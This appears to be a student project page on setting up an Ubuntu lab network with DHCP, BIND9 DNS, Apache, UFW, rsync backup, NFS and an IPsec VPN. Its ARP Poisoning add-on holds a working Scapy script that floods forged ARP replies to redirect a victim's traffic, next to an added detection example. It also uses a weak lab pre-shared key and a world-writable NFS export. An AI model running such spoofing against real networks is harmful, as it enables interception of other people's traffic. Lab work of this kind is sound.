Data Networking/Fall 2016/PAKP

Group Members

Ashwin Maniyankode Chandranathan
Kailash Natarajan
Pooja Deshpande
Pranoy Thykkoottathil Jose

Objective

The main objective of this project is to build a secure and dynamic network that provides Dynamic Host Configuration Protocol (DHCP), Domain Name System (DNS), a web server, a firewall and a backup system, using the Ubuntu Linux operating system.


Behaviour of the Protocols

Dynamic Host Configuration Protocol

Dynamic Host Configuration Protocol (DHCP) is a network protocol that lets a server automatically assign an IP address to a computer from a defined range of IP addresses (a scope) configured for a given network. The DHCP server leases an address to any DHCP-enabled client when it starts up on the network. Since the addresses are dynamic (leased) rather than static (permanently assigned), addresses that are no longer in use are automatically returned to the pool for reallocation. Both IPv4 and IPv6 addresses can be assigned by a DHCP server.

DHCP supports three mechanisms for IP address allocation:

  1. Automatic allocation: DHCP assigns an IP address to a client when it receives the client's request.
  2. Dynamic allocation: DHCP assigns IP addresses to clients for a specified period of time (or until the client explicitly relinquishes the address). When the lease expires, the client has to request an extension of the lease or request another IP address.
  3. Manual allocation: DHCP can be told to always give a particular device the same IP address, using its MAC address as the identifier. For example, a server will always get the same IP address even though it obtains it from the DHCP server.

One or more of these mechanisms is used depending on the policies of the network administrator.

Domain Name System

DNS is an application layer protocol that translates domain names to IP addresses and vice versa. Its basic job is to make life simpler for the application user: it translates a user-friendly domain name into the IP address the machine understands, which is then used to fetch and forward data. With the explosion in the use of the Internet and the World Wide Web in commercial, security and social markets among many others, users cannot be expected to remember the numeric IP addresses of sites. This is where DNS steps in: the user only needs to remember a user-friendly domain name like www.google.com, which the DNS translates into an IP address such as 8.8.8.8.

Looking further at the behaviour of the protocol: a DNS server stores the DNS records for a domain name together with the corresponding IP addresses, and it answers queries from users out of that database.

DNS records are the database entries from which the mappings are fetched. Some of the commonly used record types are A, CNAME, MX, PTR and NS.

Record type, example name, mapped data and description:

NS     test.com       dns1.test.com   Tells the host which servers are authoritative for the zone, i.e. its master and slave servers.
A      dns1.test.com  192.168.1.1     The most basic record type: maps a fully qualified domain name (FQDN) to a 32-bit IPv4 address.
CNAME  test.com       a.test.com      Maps an alias to the canonical name given in the record.
MX     test.com       mail.test.com   Maps a domain name to its mail exchange server.
PTR    192.168.1.1    dns1.test.com   The reverse direction: the user has the IP address and maps it back to the name it belongs to; these mappings are stored in reverse zones.


Webserver & Firewall

A web server runs on the Linux OS to host a website; Apache2 is the web server used here. A firewall provides a layer of security that controls the incoming and outgoing traffic of a network, blocking and filtering the packets that enter the system. The firewall can protect a whole network or a single server holding databases or confidential data, shielding it from unapproved clients inside or outside the network.

Signalling

Dynamic Host Configuration Protocol

1. When a client configured with the TCP/IP setting "Obtain an IP address automatically (DHCP)" plugs into a network, it sends a broadcast from UDP port 68 to UDP port 67 to "Discover" a DHCP server (or relay agent).
2. The DHCP server responds by sending out an "Offer" (through a relay agent if applicable).
3. The client then sends a "Request" for the offered IP address.
4. The request is finally "Acknowledged" by the server, and the client starts using the IP address.

Domain Name Server

1. The requesting host generates a DNS query packet, which is passed to the local DNS server connected to the host's network.
2. The local DNS server receives this query and forwards it to the appropriate root name server. The root name server checks whether the domain is valid and whether it has entries for it in its database, and replies to the local DNS server.
3. The local DNS server then queries the TLD DNS server, which returns the details of the authoritative name server that holds the mapping of the address or name.
4. The local DNS server then queries the authoritative name server for the mapping of the domain name or IP address that the requesting host originally asked for.

Webserver

1. The client initiates a TCP connection to the web server's IP address.
2. The connection is set up with a three-way handshake.
3. First, the client sends a SYN message requesting a TCP connection to the server on port 80.
4. The server responds with a SYN-ACK message acknowledging the request and asking the client to open a port on which the server can send information.
5. The client responds with an ACK message and then sends a request for the HTML page.

Installation Steps

DHCP

Step 1: Install DHCP server package

             sudo apt-get install isc-dhcp-server

Step 2: Edit the isc-dhcp-server file

    sudo vim /etc/default/isc-dhcp-server

On line 11 change:

    INTERFACES="ens33"

Save and exit.

Step 3: Configure the DHCP server for ipv4

Edit the file /etc/dhcp/dhcpd.conf:

    sudo vim /etc/dhcp/dhcpd.conf

    subnet 192.168.10.0 netmask 255.255.255.0 {
        range 192.168.10.30 192.168.10.99;
        option domain-name-servers 192.168.10.10;
        option subnet-mask 255.255.255.0;
        option routers 192.168.10.10;
        option broadcast-address 192.168.10.255;
        default-lease-time 600;
        max-lease-time 7200;
    }

The IPv6 address of the server's interface is set with a static inet6 stanza (this is /etc/network/interfaces syntax, not dhcpd.conf syntax):

    iface eth0 inet6 static
        address 2001:0db8:edfa:1234::1
        netmask 64
        gateway 2001:0db8:edfa:1234::2

For the servers within the network to always have the same IP, we have matched their MAC addresses with a specific IP.

            host dns-server {
            hardware ethernet 00:0c:29:8e:69:00;
            fixed-address 192.168.10.10;
            }
            host web-server {
            hardware ethernet 00:0c:29:5c:7d:2e;
            fixed-address 192.168.10.20;
            }
            host nfs-server {
            hardware ethernet 00:0c:29:8f:8b:d9;
            fixed-address 192.168.10.15;
            }

Step 4: Set the static IP address of the DHCP server

    sudo vim /etc/network/interfaces

    auto lo
    iface lo inet loopback
    auto ens33
    iface ens33 inet static
        address 192.168.10.18
        netmask 255.255.255.0
        gateway 192.168.10.1
        broadcast 192.168.10.255
        dns-nameservers 192.168.10.10

(The resolvconf hook option is spelled dns-nameservers; it is what writes the name server into resolv.conf when the interface comes up.)
          

Step 5: Edit the resolv.conf file

            sudo vim /etc/resolv.conf
            nameserver 192.168.10.10

Step 6: Restart the DHCP server

            sudo /etc/init.d/isc-dhcp-server restart

Step 7: Configuring the DHCPv6 server

Create a file named dhcpd6.conf

            sudo vim /etc/dhcp/dhcpd6.conf
            #/etc/dhcp/dhcpd6.conf
            default-lease-time 86400;
            preferred-lifetime 80000;
            allow leasequery;
            subnet6 2001:0db8:edfa:1234::/64 {
            # Range for clients
            range6 2001:0db8:edfa:1234:5678::aaaa 2001:0db8:edfa:1234:5678::ffff;
            }

DNS Server

In this project all the servers are in a private network and receive their IP addresses from the DHCP server. For DNS we have used Bind9 (Berkeley Internet Name Domain v9) on Ubuntu so that clients can resolve hostnames and IP addresses.

Prerequisite:
To configure DNS server one must have root user permissions and install Bind9. To install Bind9, use the following command,

Command:

    sudo apt-get update
    sudo apt-get install bind9 bind9utils bind9-doc
    sudo systemctl daemon-reload
    sudo systemctl restart bind9

Step 1: Obtain static IP from DHCP server and assign that in the interface – “/etc/network/interfaces”

Command:

    cd /etc/network
    sudo nano interfaces

    auto eth0
    iface eth0 inet static
        address 192.168.10.10
        netmask 255.255.255.0
        network 192.168.10.0
        broadcast 192.168.10.255
        gateway 192.168.10.1

Step 2: Now add the Name Server and Hostname details with respect to the webpage for which address resolving has to be done in the – “/etc/hosts” file.

Command:

    cd /etc
    sudo nano hosts

    127.0.0.1      localhost
    192.168.10.10  ubuntu.project.com  Ubuntu

Step 3: Provide the hostname for the webpage to be resolved in the – “/etc/hostname” file.

Command:

    cd /etc
    sudo nano hostname

    ubuntu.project.com

Step 4: Provide the IP address for the Name Server and name of the webpage in the – “/etc/resolvconf/resolv.conf.d/head” file.

Command:

    cd /etc/resolvconf/resolv.conf.d
    sudo nano head

    nameserver 192.168.10.10
    search project.com

Step 5: For the DNS server we have to declare the forward and reverse zones that provide forward and reverse domain name resolution. This is done in the "/etc/bind/named.conf.local" file.

Command:

    # Forward zone
    zone "project.com" {
        type master;                        # this server is the master for the zone
        file "/etc/bind/db.project.com";    # zone file path
        allow-transfer { 192.168.10.11; };  # secondary DNS IP
        also-notify { 192.168.10.11; };
    };

    # Reverse zone
    zone "10.168.192.in-addr.arpa" {
        type master;                        # this server is the master for the zone
        file "/etc/bind/db.192";            # zone file path
        allow-transfer { 192.168.10.11; };  # secondary DNS IP
        also-notify { 192.168.10.11; };
    };

Step 6: Now to add the forwarder IP for the DNS we can configure that in the – “/etc/bind/named.conf.options” file. There is also one more option where you can use Access Lists to only allow specified IP addresses to access the DNS server which can also be added here.

Command:

    options {
        forwarders {
            192.168.10.1;   # forwarder IP for DNS
        };
    };

Step 7: Now we have to create the forward and reverse zone which will act as the database from which the DNS server will look-up to resolve for the Domain name or IP address. This database file can be created with reference to the already existing local database file at – “/etc/bind/db.local” file and making our own copy as the – “/etc/bind/db.project.com” file for the forward zone and “/etc/bind/db.192” file for the reverse zone.

Command:

    Forward Zone Database:

    cd /etc/bind
    sudo cp db.local db.project.com
    sudo cp db.local db.192
    sudo nano /etc/bind/db.project.com

    ;
    ; BIND data file for project.com (copied from db.local)
    ;
    $TTL    604800
    @       IN SOA  ubuntu.project.com. root.project.com. (
                    9           ; Serial
                    604800      ; Refresh
                    86400       ; Retry
                    2419200     ; Expire
                    604800 )    ; Negative Cache TTL
    ;
    @       IN NS   ubuntu.project.com.
    @       IN A    192.168.10.30
    ubuntu  IN A    192.168.10.30
    web     IN A    192.168.10.20
    www     IN CNAME web.project.com.
    @       IN AAAA 2001:db8:edfa:1234::15
    ubuntu  IN AAAA 2001:db8:edfa:1234::15
    ;

Note:
• The serial number (9 here) records how many times this database file has been edited; increment it every time the file is changed, otherwise the secondary compares serials, sees no change and never transfers the updated zone.
• The @ symbol stands for the zone origin (project.com.) and applies wherever no other owner name is given.
• Each record then gives the class IN and the record type (A, CNAME, AAAA or NS), followed by its data.

    Reverse Zone Database:

    sudo nano /etc/bind/db.192

    ;
    ; BIND reverse data file for 192.168.10.0/24 (copied from db.local)
    ;
    $TTL    604800
    @       IN SOA  ubuntu.project.com. root.project.com. (
                    6           ; Serial
                    604800      ; Refresh
                    86400       ; Retry
                    2419200     ; Expire
                    604800 )    ; Negative Cache TTL
    ;
    @       IN NS   ubuntu.project.com.
    30      IN PTR  ubuntu.project.com.
    20      IN PTR  web.project.com.
    20      IN PTR  www.web.project.com.
    5.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.4.3.2.1.a.f.d.e.8.b.d.0.1.0.0.2.ip6.arpa. IN PTR ubuntu.project.com.
    ;

Note:
• The serial number (6 here) records how many times this database file has been edited; increment it every time the file is changed so that the secondary picks up the new version.
• The @ symbol stands for the zone origin (10.168.192.in-addr.arpa.) and applies wherever no other owner name is given.
• Each record then gives the class IN and the record type (PTR or NS), followed by its data. The owner of a PTR record is the reversed address, so 30 here expands to 30.10.168.192.in-addr.arpa.
• The last record's owner name ends in ip6.arpa and therefore lies outside this zone; BIND ignores such out-of-zone data when it loads db.192. To actually serve the IPv6 reverse mapping, declare a separate zone "4.3.2.1.a.f.d.e.8.b.d.0.1.0.0.2.ip6.arpa" in named.conf.local and put that PTR record in its own file.
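The two zone files above describe the same hosts, so the reverse records can be derived from the forward ones. The following is an added example, not part of the project, that does this for the forward zone's own A/AAAA records: it builds each PTR owner name by hand (reversed octets under in-addr.arpa, reversed nibbles of the full 32-digit expansion under ip6.arpa, which reproduces the long ip6.arpa name above) and files each record under the reverse zone it belongs to, so the IPv6 PTR stays out of db.192. The zone text is a constructed copy of the page's records.

```python
import ipaddress
import re

# Constructed copy of the A/AAAA/CNAME records from this project's db.project.com.
FORWARD_ZONE = """\
$ORIGIN project.com.
@       IN A    192.168.10.30
ubuntu  IN A    192.168.10.30
web     IN A    192.168.10.20
www     IN CNAME web.project.com.
@       IN AAAA 2001:db8:edfa:1234::15
ubuntu  IN AAAA 2001:db8:edfa:1234::15
"""

# Only address records (A / AAAA) are of interest; CNAME lines do not match.
RECORD_RE = re.compile(r"^(\S+)\s+IN\s+(A|AAAA)\s+(\S+)\s*$", re.M)


def reverse_name(addr):
    """Build the PTR owner name for an address.
    IPv4: reversed octets under in-addr.arpa.  IPv6: reversed hex nibbles of the
    full 32-digit expansion (leading zeros kept) under ip6.arpa."""
    ip = ipaddress.ip_address(addr)
    if ip.version == 4:
        return ".".join(reversed(str(ip).split("."))) + ".in-addr.arpa."
    nibbles = ip.exploded.replace(":", "")  # 32 hex digits
    return ".".join(reversed(nibbles)) + ".ip6.arpa."


def forward_to_ptr(zone_text, origin="project.com."):
    """Return {reverse zone name: [(owner relative to that zone, fqdn), ...]}.
    A /24 in-addr.arpa zone keeps one reversed octet as the relative owner;
    a /64 ip6.arpa zone keeps the 16 host nibbles.  Filing records this way
    is what prevents an IPv6 PTR from being dropped as out-of-zone in db.192."""
    out = {}
    for owner, rtype, target in RECORD_RE.findall(zone_text):
        fqdn = origin if owner == "@" else f"{owner}.{origin}"
        ptr = reverse_name(target)
        if rtype == "A":
            rel, zone = ptr.split(".", 1)
        else:
            parts = ptr.split(".")
            rel, zone = ".".join(parts[:16]), ".".join(parts[16:])
        out.setdefault(zone, []).append((rel, fqdn))
    return out


def reverse_zone_lines(ptr_map):
    """Render each reverse zone's records as lines ready to paste into its db file."""
    return {zone: [f"{rel} IN PTR {fqdn}" for rel, fqdn in recs]
            for zone, recs in ptr_map.items()}
```

Running forward_to_ptr on the constructed zone yields one in-addr.arpa zone (owners 30, 30, 20) and one ip6.arpa zone, matching the reverse file above except for the www.web.project.com line, which has no A record of its own.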

Step 8: Now that we have defined the database and the name servers for the DNS server, we have to restart the server for the configurations to take effect.

Command:

    sudo service bind9 restart
    sudo init 6

Configuring Secondary DNS
The primary DNS provides domain name resolution for the clients. If the primary DNS fails, the clients can no longer resolve domain names and are cut off from the web. To overcome this, it is advisable to have a secondary DNS server that acts as a backup in case the primary DNS fails. Configuring the secondary DNS is relatively easy once the primary DNS is configured.

Prerequisite:
To configure DNS server one must have root user permissions and install Bind9. To install Bind9, use the following command,

Command:

    sudo apt-get update
    sudo apt-get install bind9 bind9utils bind9-doc
    sudo systemctl daemon-reload
    sudo systemctl restart bind9

Step 1: Obtain static IP from DHCP server and assign that in the interface – “/etc/network/interfaces”

Command:

    cd /etc/network
    sudo nano interfaces

    auto eth0
    iface eth0 inet static
        address 192.168.10.11
        netmask 255.255.255.0
        network 192.168.10.0
        broadcast 192.168.10.255
        gateway 192.168.10.1

Step 2: Now add the Name Server and Hostname details with respect to the webpage for which address resolving has to be done in the – “/etc/hosts” file.

Command:

    cd /etc
    sudo nano hosts

    127.0.0.1      localhost
    192.168.10.11  ubuntu.project.com  ubuntu

Step 3: Provide the hostname for the webpage to be resolved in the – “/etc/hostname” file.

Command:

    cd /etc
    sudo nano hostname

    ubuntu.project.com

Step 4: Provide the IP address for the Secondary Name Server and name of the webpage in the – “/etc/resolvconf/resolv.conf.d/head” file.

Command:

    cd /etc/resolvconf/resolv.conf.d
    sudo nano head

    nameserver 192.168.10.11
    search project.com

Step 5: For the secondary DNS server we have to declare the forward and reverse zones that provide forward and reverse domain name resolution. This is done in the "/etc/bind/named.conf.local" file.

Command:

    # Forward zone
    zone "project.com" {
        type slave;                         # this server is a slave of the primary
        file "/etc/bind/db.project.com";    # zone file path
        masters { 192.168.10.10; };         # primary DNS IP
    };

    # Reverse zone
    zone "10.168.192.in-addr.arpa" {
        type slave;                         # this server is a slave of the primary
        file "/etc/bind/db.192";            # zone file path
        masters { 192.168.10.10; };         # primary DNS IP
    };

Step 6: Now to add the forwarder IP for the secondary DNS, we can configure that in the – “/etc/bind/named.conf.options” file. There is also one more option where you can use Access Lists to only allow specified IP addresses to access the secondary DNS server which can also be added here.

Command:

    options {
        forwarders {
            192.168.10.1;   # forwarder IP for DNS
        };
    };

Step 7: Now that we have defined the database and the name servers for the secondary DNS server, we have to restart the server for the configurations to take effect.

Command:

    sudo service bind9 restart
    sudo init 6

Webserver

Step 1: To Install Apache2 Webserver
Command:

           sudo apt-get install apache2 

Step 2: To Check whether the web server is able to listen on port 80
Command:

           netstat -a | more 

Step 3: To restart the web server
Command:

           sudo /etc/init.d/apache2 restart

Step 4: To develop a webpage for the server
Command:

    cd /var/www/html
    sudo nano index.html

Webserver Backup

The protocols used for backup are rsync and SSH. rsync synchronizes files between machines and transfers only the data that has not yet been synchronized to the backup copy. The SSH protocol provides a secure channel for sending and receiving files between Unix machines; the data is encrypted at each end. Crontab is used for scheduling the backups.

Step 1: Install rsync

              sudo apt-get install rsync 

Step 2: Install ssh

              sudo apt-get install openssh-server 

Step 3: Create a public and a private key for security

              ssh-keygen -t rsa 

Step 4: Append new public key

              cat .ssh/id_rsa.pub | ssh ashwinmc1@192.168.10.15 'cat >> .ssh/authorized_keys'

Step 5: Edit crontab

              crontab -e

Step 6: Scheduling and run the rsync command from the crontab to automate the backup of the webserver

              25 * * * * rsync -avzP --delete -e ssh /var/www/html ashwinmc1@192.168.10.15:/home/ashwinmc1/Backup

(The five fields are minute, hour, day of month, month and weekday, so this entry runs at minute 25 of every hour; the key installed in Step 4 lets it run without a password prompt.)

Firewall

Step 1: Install UFW package

           sudo apt-get install ufw

Step 2: Check UFW status

           sudo ufw status

Step 3: Set Up Default Policies

           sudo ufw default deny incoming
           sudo ufw default allow outgoing

Step 4: Allow SSH, HTTP, FTP and HTTPS connections from the local subnet

           sudo ufw allow from 192.168.10.0/24 to any port 443
           sudo ufw allow from 192.168.10.0/24 to any port 80
           sudo ufw allow from 192.168.10.0/24 to any port 21
           sudo ufw allow from 192.168.10.0/24 to any port 22

Step 5: Disabling ping

           sudo nano /etc/ufw/before.rules 

Comment out this line:
-A ufw-before-input -p icmp --icmp-type echo-request -j ACCEPT

Step 6: Enable UFW

           sudo ufw enable


Algorithm

1. A client tries to connect to the network.
2. Once connected, the client tries to obtain an IP address via DHCP, so it broadcasts a message requesting an IP.
3. The DHCP server provides an IP address to the client if the request is successful.
   Otherwise a 'request fail' message is obtained and the network administrator has to be contacted for help.
4. The client now tries to access the web server.
   If the domain name server details obtained via DHCP are correct, a request is sent to the DNS to resolve the IP address of the domain, and the DNS replies with the IP address of the web page.
   Else if the DNS reply fails, an error message 'server not found' is displayed.
   Else if the URL entered is wrong, an error message 'webpage unavailable' is displayed.
   Retry.
5. The client has reached the web server and now sends an HTTP request to it.
   If the request is successful, the web page is displayed;
   else an error message such as 'no data received' is displayed.
   Retry.

Flow Chart

Flow chart has been provided in the project report.

Add-ons Implemented (Additional Features)

ARP Poisoning

ARP poisoning has been implemented using Scapy.


         # Import the Scapy pieces used here
         from scapy.all import ARP, send, sniff

         # Setting variables (lab addresses of this project)
         attIP = "192.168.10.39"
         attMAC = "00:0c:29:7b:64:65"
         vicIP = "192.168.10.40"
         vicMAC = "00:0c:29:60:af:21"
         dgwIP = "192.168.10.20"
         dgwMAC = "00:0c:29:5c:7d:2e"

         # Forge the ARP reply for the victim (claims the gateway's IP;
         # hwsrc is left unset so Scapy fills in this host's MAC)
         arpFakeVic = ARP()
         arpFakeVic.op = 2
         arpFakeVic.psrc = dgwIP
         arpFakeVic.pdst = vicIP
         arpFakeVic.hwdst = vicMAC

         # Forge the ARP reply for the default GW (claims the victim's IP)
         arpFakeDGW = ARP()
         arpFakeDGW.op = 2
         arpFakeDGW.psrc = vicIP
         arpFakeDGW.pdst = dgwIP
         arpFakeDGW.hwdst = dgwMAC

         # Loop: keep re-sending the replies so the caches do not recover
         while True:
             # Send the ARP replies
             send(arpFakeVic)
             send(arpFakeDGW)
             print("ARP sent")
             # Wait for an ARP reply from the default GW or the victim before sending again
             sniff(filter="arp and (host %s or host %s)" % (dgwIP, vicIP), count=1)
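The defensive counterpart, added here as an example and not part of the original project: a small ARP watcher that parses raw Ethernet/ARP frames and flags an IP address whose MAC changes, which is exactly the trace the replies above leave behind. It seeds its table with the gateway binding from this project's DHCP reservation (192.168.10.20 / 00:0c:29:5c:7d:2e); the frames are constructed in memory, not captured.

```python
import struct

ETH_P_ARP = 0x0806
ARP_REPLY = 2

# Known-good binding for this project's gateway (its DHCP reservation), used as a seed.
TRUSTED = {"192.168.10.20": "00:0c:29:5c:7d:2e"}


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Construct an Ethernet+ARP reply frame in memory (constructed test input, never sent)."""
    def mac(s):
        return bytes.fromhex(s.replace(":", ""))

    def ip(s):
        return bytes(int(o) for o in s.split("."))

    eth = mac(target_mac) + mac(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
           + mac(sender_mac) + ip(sender_ip) + mac(target_mac) + ip(target_ip))
    return eth + arp


def parse_arp(frame):
    """Return (op, sender_mac, sender_ip) for an Ethernet/IPv4 ARP frame, else None."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    sha = ":".join(f"{b:02x}" for b in frame[22:28])
    spa = ".".join(str(b) for b in frame[28:32])
    return op, sha, spa


class ArpWatch:
    """Remember the MAC each IP was first seen with and flag any later change."""

    def __init__(self, trusted=None):
        self.table = dict(trusted or {})  # IP -> MAC
        self.alerts = []

    def observe(self, frame):
        """Feed one frame; returns an alert string when a binding changes, else None."""
        parsed = parse_arp(frame)
        if parsed is None or parsed[0] != ARP_REPLY:
            return None  # requests and non-ARP traffic are ignored here
        _, mac, ip = parsed
        known = self.table.get(ip)
        if known is None:
            self.table[ip] = mac  # first sighting: learn it
        elif known != mac:
            alert = f"{ip} changed from {known} to {mac}"
            self.alerts.append(alert)
            return alert
        return None


def run_sample():
    """Feed a genuine gateway reply, then two forged ones; returns the alerts raised."""
    watch = ArpWatch(TRUSTED)
    genuine = build_arp_reply("00:0c:29:5c:7d:2e", "192.168.10.20",
                              "00:0c:29:60:af:21", "192.168.10.40")
    forged = build_arp_reply("00:0c:29:7b:64:65", "192.168.10.20",
                             "00:0c:29:60:af:21", "192.168.10.40")
    for frame in (genuine, forged, forged):
        watch.observe(frame)
    return watch.alerts
```

On a real host the frames would come from a raw socket or pcap; a static ARP entry for the gateway on the clients is the simplest mitigation for a lab this size.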

NFS

Step 1: Configuring the NFS server
Command:

    sudo apt-get install nfs-kernel-server
    sudo chmod 777 /home/ashwinmc1/mnt

(The exported directory is made world-writable because root_squash maps the client's root to an unprivileged user; a dedicated group with mode 775 would be the tighter choice.)

Edit the file

              sudo nano /etc/exports

On the last line append below

              /home/ashwinmc1/mnt 192.168.10.0/255.255.255.0(rw,sync,root_squash,subtree_check)

Save and Exit
Change the directory

    cd /home/ashwinmc1/mnt
    touch newfile
    sudo nano newfile

Start the server

              sudo service nfs-kernel-server start

Step 2: Configuring the NFS client
Command to install the NFS client:

    sudo apt-get install nfs-common

Create a mount point and mount the export (server IP 192.168.10.15, server path /home/ashwinmc1/mnt, client path /home/mnt):

    sudo mkdir -p /home/mnt
    sudo mount 192.168.10.15:/home/ashwinmc1/mnt /home/mnt
    sudo reboot
    sudo mount -a

mount -a only mounts file systems listed in /etc/fstab, so the export needs an fstab entry if it is to come back after the reboot.

IPSEC VPN

IPSEC VPN has been implemented using the 'strongswan' package. The IPSEC VPN makes the connection between the two servers more secure and ensures that traffic between them cannot be read by a sniffer.

VPN First Server Configuration

Step 1:Installing the 'strongswan' package
Command:

               apt-get install ipsec-tools strongswan-starter 

Step 2: Making the crypto map entries
Edit the /etc/ipsec.conf file
Command:

    vim /etc/ipsec.conf

    conn red-to-blue
        authby=secret
        auto=route
        keyexchange=ike
        left=192.168.10.100
        right=192.168.10.200
        type=tunnel
        esp=aes128gcm16!

Step 3:Make the PSK entries

We need to edit the /etc/ipsec.secrets file. The PSK "project" is only a lab value: in any real deployment use a long random secret and keep /etc/ipsec.secrets readable by root only.

Command:

               vim /etc/ipsec.secrets
               192.168.10.100 192.168.10.200 : PSK "project"

Step 4:Restart the ipsec service
Command:

               ipsec restart

VPN Second Server Configuration

Step 1:Installing the 'strongswan' package
Command:

               apt-get install ipsec-tools strongswan-starter 

Step 2: Making the crypto map entries
Edit the /etc/ipsec.conf file
Command:

    vim /etc/ipsec.conf

    conn blue-to-red
        authby=secret
        auto=route
        keyexchange=ike
        left=192.168.10.200
        right=192.168.10.100
        type=tunnel
        esp=aes128gcm16!

Step 3:Make the PSK entries

We need to edit the /etc/ipsec.secrets file

Command:

               vim /etc/ipsec.secrets
               192.168.10.100 192.168.10.200 : PSK "project"

Step 4:Restart the ipsec service
Command:

               ipsec restart

Testing

DHCP Test

If the clients are able to obtain IP addresses from the range defined in the server's pool, then DHCP is working properly.
For example, since the DHCPv4 pool runs from 192.168.10.30 to 192.168.10.99 and the DHCPv6 pool from 2001:0db8:edfa:1234:5678::aaaa to 2001:0db8:edfa:1234:5678::ffff, if a client is assigned 192.168.10.36 and 2001:0db8:edfa:1234:5678::aaa1 through DHCP, then the DHCP server is assigning IP addresses correctly and is functioning properly.

We can also see the status of the DHCP servers by using the commands:

               systemctl status isc-dhcp-server
               systemctl status isc-dhcp-server6
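A lease check matching the test above, added here as an example rather than code from the project: it parses dhcpd.leases text, accepts active leases that fall inside the pools from dhcpd.conf and dhcpd6.conf, and flags leases outside the pool or sitting on an address reserved for one of the servers. The lease text is constructed; the pools, MACs and reservations are the page's own values.

```python
import ipaddress
import re

# Pools and reservations taken from this project's dhcpd.conf and dhcpd6.conf.
V4_POOL = (ipaddress.IPv4Address("192.168.10.30"), ipaddress.IPv4Address("192.168.10.99"))
V6_POOL = (ipaddress.IPv6Address("2001:0db8:edfa:1234:5678::aaaa"),
           ipaddress.IPv6Address("2001:0db8:edfa:1234:5678::ffff"))
RESERVED = {  # fixed-address host blocks: MAC -> IP
    "00:0c:29:8e:69:00": "192.168.10.10",  # dns-server
    "00:0c:29:5c:7d:2e": "192.168.10.20",  # web-server
    "00:0c:29:8f:8b:d9": "192.168.10.15",  # nfs-server
}

# Constructed sample in ISC dhcpd.leases syntax (not a capture from the lab).
SAMPLE_LEASES = """\
lease 192.168.10.36 {
  ends 1 2016/11/21 10:10:00;
  binding state active;
  hardware ethernet 00:0c:29:60:af:21;
  client-hostname "client1";
}
lease 192.168.10.120 {
  ends 1 2016/11/21 10:12:00;
  binding state active;
  hardware ethernet 00:0c:29:7b:64:65;
}
lease 192.168.10.20 {
  ends 1 2016/11/21 10:13:00;
  binding state active;
  hardware ethernet 00:0c:29:aa:bb:cc;
}
lease 192.168.10.40 {
  ends 1 2016/11/21 09:10:00;
  binding state free;
  hardware ethernet 00:0c:29:11:22:33;
}
"""

LEASE_RE = re.compile(r"lease\s+(\S+)\s*\{(.*?)\}", re.S)


def parse_leases(text):
    """Return one dict (ip, mac, state) per lease block in dhcpd.leases text."""
    leases = []
    for m in LEASE_RE.finditer(text):
        body = m.group(2)
        mac = re.search(r"hardware ethernet\s+([0-9a-fA-F:]+);", body)
        state = re.search(r"binding state\s+(\w+);", body)
        leases.append({
            "ip": ipaddress.ip_address(m.group(1)),
            "mac": mac.group(1).lower() if mac else None,
            "state": state.group(1) if state else "unknown",
        })
    return leases


def address_in_pool(addr):
    """True when the address lies inside the dynamic range of its address family."""
    ip = ipaddress.ip_address(addr)
    lo, hi = V4_POOL if ip.version == 4 else V6_POOL
    return lo <= ip <= hi


def audit(text):
    """Return (ok, problems): active leases inside the pool, and findings.
    A finding is an active lease outside the pool, or a reserved server
    address held by a MAC other than the one in its host {} block."""
    ok, problems = [], []
    reserved_ips = set(RESERVED.values())
    for lease in parse_leases(text):
        if lease["state"] != "active":
            continue  # free/expired leases are not in use
        ip = str(lease["ip"])
        if ip in reserved_ips and RESERVED.get(lease["mac"]) != ip:
            problems.append(f"{ip} is reserved for a server but leased to {lease['mac']}")
        elif not address_in_pool(ip):
            problems.append(f"{ip} leased to {lease['mac']} is outside the pool")
        else:
            ok.append(ip)
    return ok, problems
```

address_in_pool returns False for the 2001:0db8:edfa:1234:5678::aaa1 quoted above, since 0xaaa1 is below the pool start ::aaaa, while 192.168.10.36 is inside; a client showing that v6 address is therefore not by itself proof that the DHCPv6 range is in use.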

DNS Test

For testing the functioning and effectiveness of DNS, the following commands are useful:

1) dig
The Domain Information Groper is used to query DNS name servers. It performs DNS lookups and returns the response from the name servers. For example, we can request a zone transfer from the master on the secondary DNS with the following command:

    dig @192.168.10.10 project.com AXFR

This returns the records of the zone from the master server. It succeeds from the secondary because the master's allow-transfer lists 192.168.10.11; from any other host the transfer should be refused, which is itself a useful check.
2) ping
ping checks the network layer reachability of a server. Run it on both the master and the slave DNS to confirm that each can reach the other.
3) nslookup
nslookup is a command used to query DNS servers. Interactive mode lets the user query the name servers for information about hosts and domains. Non-interactive mode prints just the name and the requested information for a particular host or domain.
4) host
host is used for DNS lookups. It resolves hostnames to IP addresses and vice versa.

Webserver Test

Open the web browser and enter the host name or the local IP address. If it is working, then the web server is up and running.

Firewall Test

A client can try to ping the servers that are blocked. If the response is 'request timed-out' then, the firewall has blocked the client and it is working as per the firewall rules.

VPN Test

To test IPSEC VPN, run a continuous ping from one server to the other. Simultaneously, run the command:

              watch ipsec statusall

or

              tcpdump esp

If the packet count increases in the first case, or packets appear in the second case, then the IPSEC tunnel is configured properly.

ARP Poisoning Test

When the client tries to access the webpage, if he/she is redirected to the hacked page, then ARP poisoning has been properly implemented.

Future Scope

1. Implementing AAA servers for added security.
2. Additional Firewall rules for added security.
3. Adding Mail servers.
4. Expanding server capabilities.
5. Increase the number of DNS for load distribution and decentralization.
